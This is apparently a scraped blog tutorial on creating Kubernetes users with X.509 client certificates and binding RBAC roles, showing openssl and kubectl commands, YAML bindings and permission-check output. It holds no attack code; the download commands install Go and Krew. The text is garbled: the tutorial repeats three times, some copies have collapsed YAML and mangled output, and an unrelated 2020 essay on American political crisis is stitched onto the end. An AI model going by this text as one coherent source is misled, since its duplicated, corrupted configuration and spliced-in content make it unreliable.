title: Users and RBAC authorizations in Kubernetes
title: Users and RBAC authorizations in Kubernetes description: Having your Kubernetes cluster up and running is just the start of your journey and you now need to operate. To secure its access, user identities must be declared along with authentication and… image: https://www.adaltas.com/static/ce2279a25f86b612f1bcda5b90467b2d/f3583/rbac.png
author: Robert Walid SOARES description: Having your Kubernetes cluster up and running is just the start of your journey and you now need to operate. To secure its access, user identities must be declared along with authentication and… image: https://www.adaltas.com/static/ce2279a25f86b612f1bcda5b90467b2d/f3583/rbac.png title: Users and RBAC authorizations in Kubernetes
Having your Kubernetes cluster up and running is just the start of your journey and you now need to operate. To secure its access, user identities must be declared along with authentication and authorization properly managed.
Role-based access control (RBAC) is a method of regulating access to computers and network resources based on the roles of individual users within an enterprise. We can use Role-based access control on all the Kubernetes resources that allow CRUD (Create, Read, Update, Delete). Examples of resources:
Role and ClusterRole
They are just a set of rules that represent a set of permissions. A Role can only be used to grant access to resources within namespaces. A ClusterRole can be used to grant the same permissions as a Role but they can also be used to grant access to cluster-scoped resources, non-resource endpoints.
We can, of course, create specific Roles and ClusterRoles, but we recommend you to use the default as long as you can. It can quickly become difficult to manage all of this.
Use Case:
We will create two namespaces “my-project-dev” and “my-project-prod” and two users “jean” and “sarah” with different roles to those namespaces:
my-project-dev:
jean: Edit
my-project-prod:
jean: View
sarah: Edit
Users creation and authentication with X.509 client certificates
Normal users are assumed to be managed by an outside, independent service. An admin distributing private keys, a user store like Keystone or Google Accounts, even a file with a list of usernames and passwords. In this regard, Kubernetes does not have objects which represent normal user accounts. Normal users cannot be added to a cluster through an API call.
Pass a configuration with content like the following to API Server
password,username,uid,group
X.509 client certificate
Create a user’s private key and a certificate signing request
Get it certified by a CA (Kubernetes CA) to have the user’s certificate
Bearer Tokens (JSON Web Tokens)
OpenID Connect
On top of OAuth 2.0
Webhooks
For the purpose of this article we will use X.509 client certificates with OpenSSL for their simplicity. There are different steps for users creation. We will go step by step. You have to perform the actions as a user with cluster-admin credentials. These are the steps for user creation (here for “jean”):
Create a user on the master machine then go into its home directory to perform the remaining steps.
useradd jean &&cd /home/jean
Create a private key:
openssl genrsa -out jean.key 2048
Create a certificate signing request (CSR). CN is the username and O the group. We can set permissions by group, which can simplify management if we have, for example, multiple users with the same authorizations.
Sign the CSR with the Kubernetes CA. We have to use the CA cert and key which are normally in /etc/kubernetes/pki/. Our certificate will be valid for 500 days.
Edit the user config file. The config file has the information needed for the authentication to the cluster. You can use the cluster admin config which is normally in /etc/kubernetes. The “certificate-authority-data” and “server” variables have to be as in the cluster admin config.
Then we need to copy the config above in the .kube directory.
mkdir .kube &&vi .kube/config
Now we need to grant all the created files and directories to the user:
chown -R jean: /home/jean/
Now we have a user “jean” created. We will do the same for user “sarah”. There are many steps to perform and it can be very time consuming to do if we have multiple users to create. This is why I edit bash scripts which automate the process. You can find them on my Github repository.
Now we have our users, we can create the two namespaces:
As we have not defined any authorization to the users, they should get forbidden access to all cluster resources.
User: Jean
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "jean" cannot list resource "nodes"in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods"in API group ""in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods"in API group ""in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods"in API group ""in the namespace "my-project-dev"
User: Sarah
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "sarah" cannot list resource "nodes"in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "my-project-dev"
We will use the default ClusterRole available. However we will show you how to create specific Role/ClusterRole. A Role/ClusterRole are just a list of verbs (actions) permitted on specific resources and namespaces. Here is an example of a YAML file:
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: Role
metadata:name: list-deployments
namespace: my-project-dev
rules:-apiGroups:[ apps ]resources:[ deployments ]verbs:[ get, list ]---------------------------------apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:name: list-deployments
rules:-apiGroups:[ apps ]resources:[ deployments ]verbs:[ get, list ]
We need to create RoleBinding by namespaces and not by user. It means that for our user “jean” we need to create two RoleBinding for his authorizations. Example of RoleBinding YAML file for Jean:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: jean
namespace: my-project-dev
subjects:-kind: User
name: jean
apiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRole
name: edit
apiGroup: rbac.authorization.k8s.io
---------------------------------apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: jean
namespace: my-project-prod
subjects:-kind: User
name: jean
apiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRole
name: view
apiGroup: rbac.authorization.k8s.io
We assign to “jean” the view Role on “my-project-prod” and the edit Role on “my-project-dev”. We will do the same for “sarah” authorizations. To create them:
kubectl apply -f /path/to/your/yaml/file
We have used kubectl apply here instead of kubectl create. The difference between “apply” and “create” is that “create” will create the object if it doesn’t exist and do nothing else. But if we “apply” a yaml file it means that it will create the object if it doesn’t exist and update it if needed.
Let’s check if our users have the right permissions.
kubectl get pods -n my-project-prod
No resources found.
kubectl run nginx --image=nginx --replicas=1 -n my-project-prod
deployment.apps/nginx created
[sarah@master1 ~]$kubectl get pods -n my-project-prod
NAME READY STATUS RESTARTS AGE
nginx-7db9fccd9b-t14qw 1/1 Running 0 4s
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "my-project-dev"
kubectl run nginx --image=nginx --replicas=1 -n my-project-dev
Error from server (Forbidden): deployments.apps is forbidden: User "sarah" cannot create resource "deployments"in API group "apps"in the namespace "my-project-dev"
User: jean (View on “my-project-prod” & Edit on “my-project-dev”)
kubectl get pods -n my-project-prod
NAME READY STATUS RESTARTS AGE
nginx-7db9fccd9b-t14qw 1/1 Running 0 101s
[jean@master1 —]$ kubectl get deploy -n my-project-prod
NAME READY UP-TO-DATE AVAILABLE AGE
nginx 1/1 11 110s
kubectl delete deploy/nginx -n my-project-prod
Error from server (Forbidden): deployments.extensions "nginx" is forbidden: User "jean" cannot delete resource "deployments"in API group "extensions"in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
No resources found.
kubectl run nginx --image=nginx --replicas=1 -n my-project-dev
deployment.apps/nginx created
kubectl get deploy -n my-project-dev
NAME READY UP-TO-DATE AVAILABLE AGE
nginx 0/1 10 13s
kubectl delete deploy/nginx -n my-project-dev
deployment.extensions "nginx" deleted
kubectl get deploy -n my-project-dev
No resources found.
Now that we have set different roles and authorizations to our users, how can we manage all of this? How can we know if a user has the right access? How to know who can actually perform a specific action? How to have an overview of all the users access? These are the questions we need to answer to ensure cluster security. In Kubernetes we have the command kubectl auth can-i that allows us to know if a user can perform a specific action.
kubectl auth can-i list pods
kubectl auth can-i list pods --as jean
This first command allows a user to know if he can perform an action. The second command allows an administrator to impersonate a user to know if the targeted user can perform an action. The impersonation can only be used by a user with cluster-admin credentials. Apart from that, we can’t do much more. This is why we will introduce you some open-source projects that allows us to extend the functionalities covered by the kubectl auth can-i command. Before introducing them, we will install some of their dependencies such as Krew and GO.
Go is an open source programming language that makes it easy to build simple, reliable, and efficient software. Inspired by C and Pascal, this language was developed by Google from an initial concept of Robert Griesemer, Rob Pike and Ken Thompson.
Krew is a tool that makes it easy to use kubectl plugins. Krew helps you discover plugins, install and manage them on your machine. It is similar to tools like apt, dnf or brew. Krew is only compatible with kubectl v1.12 and above.
This project helps us to know all the authorizations that have been granted to a user. It helps to answer to the question: what can do “jean”? Firstly, let’s install Rakkess:
This project allows us to know who are the users who can perform a specific action. It helps to answer the question: who can do this action? Installation:
This project permits us to have a RBAC overview. It helps to answer the questions: Which Role has “jean”? “sarah”? All the users? all the group? To install the project:
This project allows us to have a manager for RBAC, as its name suggests. It simplifies many manipulations. The most important one is RoleBindings creation. Indeed we saw that if we needed to create different Roles for a user we needed to create different RoleBindings. RBAC Manager helps us by allowing us to create just one RoleBinding with all the authorizations inside. To install it, you can download the YAML file from the Github repository:
apiVersion: rbacmanager.reactiveops.io/v1beta1
kind: RBACDefinition
metadata:name: jose
rbacBindings:-name: jose
subjects:-kind: User
name: jose
roleBindings:-namespace: my-project-prod
clusterRole: edit
-namespace: my-project-dev
clusterRole: edit
Conclusion
We have created users inside Kubernetes cluster using X.509 client certificate with OpenSSL and granting them authorizations. You can use the script available on my Github repository in order to create users easily. As for the cluster administration, you can use the open-source projects that have been introduced in this article. To sum up those projects:
RBAC Manager: get simpler configuration that groups bindings together, easy to automate RBAC changes, and label selectors.
It can be very time consuming to handle all the steps about user creation. Especially if we have multiple users to create at once and others to create frequently. It could be easier if an enterprise LDAP is connected to Kubernetes cluster. There are open-source projects that provide a direct LDAP authentication webhook for Kubernetes: Kismatic and ObjectifLibre. Another solution is to configure an OpenId server with your enterprise LDAP for its backend.
Having your Kubernetes cluster up and running is just the start of your journey and you now need to operate. To secure its access, user identities must be declared along with authentication and authorization properly managed.
Role-based access control (RBAC) is a method of regulating access to computers and network resources based on the roles of individual users within an enterprise. We can use Role-based access control on all the Kubernetes resources that allow CRUD (Create, Read, Update, Delete). Examples of resources:
Role and ClusterRole
They are just a set of rules that represent a set of permissions. A Role can only be used to grant access to resources within namespaces. A ClusterRole can be used to grant the same permissions as a Role but they can also be used to grant access to cluster-scoped resources, non-resource endpoints.
We can, of course, create specific Roles and ClusterRoles, but we recommend you to use the default as long as you can. It can quickly become difficult to manage all of this.
Use Case:
We will create two namespaces “my-project-dev” and “my-project-prod” and two users “jean” and “sarah” with different roles to those namespaces:
my-project-dev:
my-project-prod:
Users creation and authentication with X.509 client certificates
Normal users are assumed to be managed by an outside, independent service. An admin distributing private keys, a user store like Keystone or Google Accounts, even a file with a list of usernames and passwords. In this regard, Kubernetes does not have objects which represent normal user accounts. Normal users cannot be added to a cluster through an API call.
Pass a configuration with content like the following to API Server
password,username,uid,group
X.509 client certificate
Create a user’s private key and a certificate signing request
Get it certified by a CA (Kubernetes CA) to have the user’s certificate
Bearer Tokens (JSON Web Tokens)
OpenID Connect
On top of OAuth 2.0
Webhooks
For the purpose of this article we will use X.509 client certificates with OpenSSL for their simplicity. There are different steps for users creation. We will go step by step. You have to perform the actions as a user with cluster-admin credentials. These are the steps for user creation (here for “jean”):
Create a user on the master machine then go into its home directory to perform the remaining steps.
useradd jean &&cd /home/jean
Create a private key:
openssl genrsa -out jean.key 2048
Create a certificate signing request (CSR). CN is the username and O the group. We can set permissions by group, which can simplify management if we have, for example, multiple users with the same authorizations.
Sign the CSR with the Kubernetes CA. We have to use the CA cert and key which are normally in /etc/kubernetes/pki/. Our certificate will be valid for 500 days.
Edit the user config file. The config file has the information needed for the authentication to the cluster. You can use the cluster admin config which is normally in /etc/kubernetes. The “certificate-authority-data” and “server” variables have to be as in the cluster admin config.
Then we need to copy the config above in the .kube directory.
mkdir .kube &&vi .kube/config
Now we need to grant all the created files and directories to the user:
chown -R jean: /home/jean/
Now we have a user “jean” created. We will do the same for user “sarah”. There are many steps to perform and it can be very time consuming to do if we have multiple users to create. This is why I edit bash scripts which automate the process. You can find them on my Github repository.
Now we have our users, we can create the two namespaces:
As we have not defined any authorization to the users, they should get forbidden access to all cluster resources.
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "jean" cannot list resource "nodes"in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods"in API group ""in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods"in API group ""in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods"in API group ""in the namespace "my-project-dev"
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "sarah" cannot list resource "nodes"in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "my-project-dev"
We will use the default ClusterRole available. However we will show you how to create specific Role/ClusterRole. A Role/ClusterRole are just a list of verbs (actions) permitted on specific resources and namespaces. Here is an example of a YAML file:
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: Role
metadata:name: list-deployments namespace: my-project-dev
rules:-apiGroups:[ apps ]resources:[ deployments ]verbs:[ get, list ]---------------------------------apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:name: list-deployments
rules:-apiGroups:[ apps ]resources:[ deployments ]verbs:[ get, list ]
We are now going to bind default ClusterRole (Edit and View) to our users as below:
We need to create RoleBinding by namespaces and not by user. It means that for our user “jean” we need to create two RoleBinding for his authorizations. Example of RoleBinding YAML file for Jean:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: jean namespace: my-project-dev
subjects:-kind: User name: jean apiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRole name: edit apiGroup: rbac.authorization.k8s.io
---------------------------------apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: jean namespace: my-project-prod
subjects:-kind: User name: jean apiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRole name: view apiGroup: rbac.authorization.k8s.io
We assign to “jean” the view Role on “my-project-prod” and the edit Role on “my-project-dev”. We will do the same for “sarah” authorizations. To create them:
kubectl apply -f /path/to/your/yaml/file
We have used kubectl apply here instead of kubectl create. The difference between “apply” and “create” is that “create” will create the object if it doesn’t exist and do nothing else. But if we “apply” a yaml file it means that it will create the object if it doesn’t exist and update it if needed.
Let’s check if our users have the right permissions.
User: sarah (Edit on “my-project-prod”)
kubectl get pods -n my-project-prod No resources found. kubectl run nginx --image=nginx --replicas=1 -n my-project-prod deployment.apps/nginx created [sarah@master1 ~]$kubectl get pods -n my-project-prod NAME READY STATUS RESTARTS AGE nginx-7db9fccd9b-t14qw 1/1 Running 0 4s kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods"in API group ""in the namespace "my-project-dev" kubectl run nginx --image=nginx --replicas=1 -n my-project-dev Error from server (Forbidden): deployments.apps is forbidden: User "sarah" cannot create resource "deployments"in API group "apps"in the namespace "my-project-dev"
kubectl get pods -n my-project-prod NAME READY STATUS RESTARTS AGE nginx-7db9fccd9b-t14qw 1/1 Running 0 101s [jean@master1 —]$ kubectl get deploy -n my-project-prod NAME READY UP-TO-DATE AVAILABLE AGE nginx 1/1 11 110s kubectl delete deploy/nginx -n my-project-prod Error from server (Forbidden): deployments.extensions "nginx" is forbidden: User "jean" cannot delete resource "deployments"in API group "extensions"in the namespace "my-project-prod" kubectl get pods -n my-project-dev
No resources found. kubectl run nginx --image=nginx --replicas=1 -n my-project-dev deployment.apps/nginx created kubectl get deploy -n my-project-dev NAME READY UP-TO-DATE AVAILABLE AGE nginx 0/1 10 13s kubectl delete deploy/nginx -n my-project-dev deployment.extensions "nginx" deleted
kubectl get deploy -n my-project-dev
No resources found.
Now that we have set different roles and authorizations to our users, how can we manage all of this? How can we know if a user has the right access? How to know who can actually perform a specific action? How to have an overview of all the users access? These are the questions we need to answer to ensure cluster security. In Kubernetes we have the command kubectl auth can-i that allows us to know if a user can perform a specific action.
kubectl auth can-i list pods
kubectl auth can-i list pods --as jean
This first command allows a user to know if he can perform an action. The second command allows an administrator to impersonate a user to know if the targeted user can perform an action. The impersonation can only be used by a user with cluster-admin credentials. Apart from that, we can’t do much more. This is why we will introduce you some open-source projects that allows us to extend the functionalities covered by the kubectl auth can-i command. Before introducing them, we will install some of their dependencies such as Krew and GO.
Go is an open source programming language that makes it easy to build simple, reliable, and efficient software. Inspired by C and Pascal, this language was developed by Google from an initial concept of Robert Griesemer, Rob Pike and Ken Thompson.
Krew is a tool that makes it easy to use kubectl plugins. Krew helps you discover plugins, install and manage them on your machine. It is similar to tools like apt, dnf or brew. Krew is only compatible with kubectl v1.12 and above.
This project helps us to know all the authorizations that have been granted to a user. It helps to answer to the question: what can do “jean”? Firstly, let’s install Rakkess:
This project allows us to know who are the users who can perform a specific action. It helps to answer the question: who can do this action? Installation:
This project permits us to have a RBAC overview. It helps to answer the questions: Which Role has “jean”? “sarah”? All the users? all the group? To install the project:
This project allows us to have a manager for RBAC, as its name suggests. It simplifies many manipulations. The most important one is RoleBindings creation. Indeed we saw that if we needed to create different Roles for a user we needed to create different RoleBindings. RBAC Manager helps us by allowing us to create just one RoleBinding with all the authorizations inside. To install it, you can download the YAML file from the Github repository:
apiVersion: rbacmanager.reactiveops.io/v1beta1
kind: RBACDefinition
metadata:name: jose
rbacBindings:-name: jose subjects:-kind: User name: jose roleBindings:-namespace: my-project-prod clusterRole: edit -namespace: my-project-dev clusterRole: edit
Conclusion
We have created users inside Kubernetes cluster using X.509 client certificate with OpenSSL and granting them authorizations. You can use the script available on my Github repository in order to create users easily. As for the cluster administration, you can use the open-source projects that have been introduced in this article. To sum up those projects:
It can be very time consuming to handle all the steps about user creation. Especially if we have multiple users to create at once and others to create frequently. It could be easier if an enterprise LDAP is connected to Kubernetes cluster. There are open-source projects that provide a direct LDAP authentication webhook for Kubernetes: Kismatic and ObjectifLibre. Another solution is to configure an OpenId server with your enterprise LDAP for its backend.
Having your Kubernetes cluster up and running is just the start of your journey and you now need to operate. To secure its access, user identities must be declared along with authentication and authorization properly managed.
Role-based access control (RBAC) is a method of regulating access to computers and network resources based on the roles of individual users within an enterprise. We can use Role-based access control on all the Kubernetes resources that allow CRUD (Create, Read, Update, Delete). Examples of resources:
Role and ClusterRole
They are just a set of rules that represent a set of permissions. A Role can only be used to grant access to resources within namespaces. A ClusterRole can be used to grant the same permissions as a Role but they can also be used to grant access to cluster-scoped resources, non-resource endpoints.
We can, of course, create specific Roles and ClusterRoles, but we recommend you to use the default as long as you can. It can quickly become difficult to manage all of this.
Use Case:
We will create two namespaces “my-project-dev” and “my-project-prod” and two users “jean” and “sarah” with different roles to those namespaces:
my-project-dev:
jean: Edit
my-project-prod:
jean: View
sarah: Edit
Users creation and authentication with X.509 client certificates
Normal users are assumed to be managed by an outside, independent service. An admin distributing private keys, a user store like Keystone or Google Accounts, even a file with a list of usernames and passwords. In this regard, Kubernetes does not have objects which represent normal user accounts. Normal users cannot be added to a cluster through an API call.
Pass a configuration with content like the following to API Server
password,username,uid,group
X.509 client certificate
Create a user’s private key and a certificate signing request
Get it certified by a CA (Kubernetes CA) to have the user’s certificate
Bearer Tokens (JSON Web Tokens)
OpenID Connect
On top of OAuth 2.0
Webhooks
For the purpose of this article we will use X.509 client certificates with OpenSSL for their simplicity. There are different steps for users creation. We will go step by step. You have to perform the actions as a user with cluster-admin credentials. These are the steps for user creation (here for “jean”):
Create a user on the master machine then go into its home directory to perform the remaining steps.
useradd jean && cd /home/jean
Create a private key:
openssl genrsa -out jean.key 2048
Create a certificate signing request (CSR). CN is the username and O the group. We can set permissions by group, which can simplify management if we have, for example, multiple users with the same authorizations.
# Without Group
openssl req -new -key jean.key \
-out jean.csr \
-subj "/CN=jean"
# With a Group where $group is the group name
openssl req -new -key jean.key \
-out jean.csr \
-subj "/CN=jean/O=$group"
#If the user has multiple groups
openssl req -new -key jean.key \
-out jean.csr \
-subj "/CN=jean/O=$group1/O=$group2/O=$group3"
Sign the CSR with the Kubernetes CA. We have to use the CA cert and key which are normally in /etc/kubernetes/pki/. Our certificate will be valid for 500 days.
Edit the user config file. The config file has the information needed for the authentication to the cluster. You can use the cluster admin config which is normally in /etc/kubernetes. The “certificate-authority-data” and “server” variables have to be as in the cluster admin config.
Then we need to copy the config above in the .kube directory.
mkdir .kube && vi .kube/config
Now we need to grant all the created files and directories to the user:
chown -R jean: /home/jean/
Now we have a user “jean” created. We will do the same for user “sarah”. There are many steps to perform and it can be very time consuming to do if we have multiple users to create. This is why I edit bash scripts which automate the process. You can find them on my Github repository.
Now we have our users, we can create the two namespaces:
As we have not defined any authorization to the users, they should get forbidden access to all cluster resources.
User: Jean
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "jean" cannot list resource "nodes" in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods" in API group "" in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods" in API group "" in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods" in API group "" in the namespace "my-project-dev"
User: Sarah
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "sarah" cannot list resource "nodes" in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "my-project-dev"
We will use the default ClusterRole available. However we will show you how to create specific Role/ ClusterRole. A Role/ ClusterRole are just a list of verbs (actions) permitted on specific resources and namespaces. Here is an example of a YAML file:
We need to create RoleBinding by namespaces and not by user. It means that for our user “jean” we need to create two RoleBinding for his authorizations. Example of RoleBinding YAML file for Jean:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: jean
namespace: my-project-dev
subjects:
- kind: User
name: jean
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: edit
apiGroup: rbac.authorization.k8s.io
---------------------------------
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: jean
namespace: my-project-prod
subjects:
- kind: User
name: jean
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: view
apiGroup: rbac.authorization.k8s.io
We assign to “jean” the view Role on “my-project-prod” and the edit Role on “my-project-dev”. We will do the same for “sarah” authorizations. To create them:
kubectl apply -f /path/to/your/yaml/file
We have used kubectl apply here instead of kubectl create. The difference between “apply” and “create” is that “create” will create the object if it doesn’t exist and do nothing else. But if we “apply” a yaml file it means that it will create the object if it doesn’t exist and update it if needed.
Let’s check if our users have the right permissions.
kubectl get pods -n my-project-prod
No resources found.
kubectl run nginx --image=nginx --replicas=1 -n my-project-prod
deployment.apps/nginx created
[sarah@master1 ~]$kubectl get pods -n my-project-prod
NAME READY STATUS RESTARTS AGE
nginx-7db9fccd9b-t14qw 1/1 Running 0 4s
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "my-project-dev"
kubectl run nginx --image=nginx --replicas=1 -n my-project-dev
Error from server (Forbidden): deployments.apps is forbidden: User "sarah" cannot create resource "deployments" in API group "apps" in the namespace "my-project-dev"
User: jean (View on “my-project-prod” & Edit on “my-project-dev”)
kubectl get pods -n my-project-prod
NAME READY STATUS RESTARTS AGE
nginx-7db9fccd9b-t14qw 1/1 Running 0 101s
[jean@master1 —]$ kubectl get deploy -n my-project-prod
NAME READY UP-TO-DATE AVAILABLE AGE
nginx 1/1 1 1 110s
kubectl delete deploy/nginx -n my-project-prod
Error from server (Forbidden): deployments.extensions "nginx" is forbidden: User "jean" cannot delete resource "deployments" in API group "extensions" in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
No resources found.
kubectl run nginx --image=nginx --replicas=1 -n my-project-dev
deployment.apps/nginx created
kubectl get deploy -n my-project-dev
NAME READY UP-TO-DATE AVAILABLE AGE
nginx 0/1 1 0 13s
kubectl delete deploy/nginx -n my-project-dev
deployment.extensions "nginx" deleted
kubectl get deploy -n my-project-dev
No resources found.
Manage users and theirs authorizations
Now that we have set different roles and authorizations to our users, how can we manage all of this? How can we know if a user has the right access? How to know who can actually perform a specific action? How to have an overview of all the users access? These are the questions we need to answer to ensure cluster security. In Kubernetes we have the command kubectl auth can-i that allows us to know if a user can perform a specific action.
# kubectl auth can-i $action $resource --as $subject
kubectl auth can-i list pods
kubectl auth can-i list pods --as jean
This first command allows a user to know if he can perform an action. The second command allows an administrator to impersonate a user to know if the targeted user can perform an action. The impersonation can only be used by a user with cluster-admin credentials. Apart from that, we can’t do much more. This is why we will introduce you some open-source projects that allows us to extend the functionalities covered by the kubectl auth can-i command. Before introducing them, we will install some of their dependencies such as Krew and GO.
Go is an open source programming language that makes it easy to build simple, reliable, and efficient software. Inspired by C and Pascal, this language was developed by Google from an initial concept of Robert Griesemer, Rob Pike and Ken Thompson.
wget https://dl.google.com/go/go1.12.5.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.12.5.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
Krew is a tool that makes it easy to use kubectl plugins. Krew helps you discover plugins, install and manage them on your machine. It is similar to tools like apt, dnf or brew. Krew is only compatible with kubectl v1.12 and above.
set -x; cd "$(mktemp -d)" &&
curl -fsSLO "https://storage.googleapis.com/krew/v0.2.1/krew.{tar.gz,yaml}" &&
tar zxvf krew.tar.gz &&
./krew-"$(uname | tr '[:upper:]' '[:lower:]')_amd64" install \
--manifest=krew.yaml --archive=krew.tar.gz
export PATH="${KREW_ROOT:-$HOME/.krew}/bin:$PATH"
This project helps us to know all the authorizations that have been granted to a user. It helps to answer to the question: what can do “jean”? Firstly, let’s install Rakkess:
This project allows us to know who are the users who can perform a specific action. It helps to answer the question: who can do this action? Installation:
This project permits us to have a RBAC overview. It helps to answer the questions: Which Role has “jean”? “sarah”? All the users? all the group? To install the project:
This project allows us to have a manager for RBAC, as its name suggests. It simplifies many manipulations. The most important one is RoleBindings creation. Indeed we saw that if we needed to create different Roles for a user we needed to create different RoleBindings. RBAC Manager helps us by allowing us to create just one RoleBinding with all the authorizations inside. To install it, you can download the YAML file from the Github repository:
apiVersion: rbacmanager.reactiveops.io/v1beta1
kind: RBACDefinition
metadata:
name: jose
rbacBindings:
- name: jose
subjects:
- kind: User
name: jose
roleBindings:
- namespace: my-project-prod
clusterRole: edit
- namespace: my-project-dev
clusterRole: edit
Conclusion
We have created users inside Kubernetes cluster using X.509 client certificate with OpenSSL and granting them authorizations. You can use the script available on my Github repository in order to create users easily. As for the cluster administration, you can use the open-source projects that have been introduced in this article. To sum up those projects:
RBAC Manager: get simpler configuration that groups bindings together, easy to automate RBAC changes, and label selectors.
It can be very time consuming to handle all the steps about user creation. Especially if we have multiple users to create at once and others to create frequently. It could be easier if an enterprise LDAP is connected to Kubernetes cluster. There are open-source projects that provide a direct LDAP authentication webhook for Kubernetes: Kismatic and ObjectifLibre. Another solution is to configure an OpenId server with your enterprise LDAP for its backend.
title: Hic Sunt Dracones description: 01 June 2020 We are in a period of extended turmoil that might informally be called the “omni-crisis.” There is no clear resolution in sight to the COVID-19 pandemic and the various material,…
author: Adam Elkus title: Hic Sunt Dracones
We are in a period of extended turmoil that might informally be called the “omni-crisis.” There is no clear resolution in sight to the COVID-19 pandemic and the various material, psychological, social, economic, and political disruptions it has directly or indirectly produced or accelerated. Escalating civil unrest without an obvious off-ramp now follows in its wake. This moment may pass (hopefully sooner rather than later) and be memory-holed as a particularly nasty but ultimately temporary lapse of collective judgment. If this indeed occurs, this post will likely seem overly dramatic in its warning of a great rupture in the fabric of social space-time. Or current events may be far more sinister and consequential in nature than depicted here. In which case this post may seem overly naive in its refusal to directly entertain the worst-case scenarios. Consider this non-exhaustive list of factors simultaneously operative in America this month:
Historically unpopular and divisive President
The prospect of contested 2020 general elections
Intense political factionalism and micro-factionalism
Widespread economic devastation
Fraying social safety net
100,000+ dead from a pandemic
Half-implemented lockdown
Rising US-China tensions
US exit from international institutions
Widely televised images of security force brutality against civilians
Nationwide protests, riots, and clashes
Clampdowns and threats of further and more severe crackdowns
What do all of these things together mean in totality? Nothing. But also everything. Do not needlessly panic. However, the longer the omni-crisis continues, the narrower and narrower the window for escaping from it without substantial damage will be. But, you say, haven’t we suffered enough? Look at the damage we have already incurred! To butcher a saying applicable to a totally different context, there is plenty of room at the bottom. People grow acclimated to things thought previously intolerable, causing them to (rightly) fear even more terrible outcomes. By our own merits, we’ve already adjusted to a level of uncertainty about social arrangements that we previously thought intolerable. And we may adjust ourselves again sooner than we think.
“Is this as bad as 1968?” is an utterly meaningless question precisely for this underlying reason. People do not invoke 1968 because of the objective similarities between 2020 and 1968. They do so because we have crossed a threshold at which basic foundations of social organization we take for granted now seem up for grabs. This is an inherently subjective determination, based on the circumstances of our present much as people in 1968 similarly judged the state of their worlds to be in flux. 1968 is an arbitrary signpost on an unfamiliar road we are driving down at breakneck speeds. You can blast “Gimme Shelter” on the car stereo for the aesthetic, but it’s not worth much more than that.
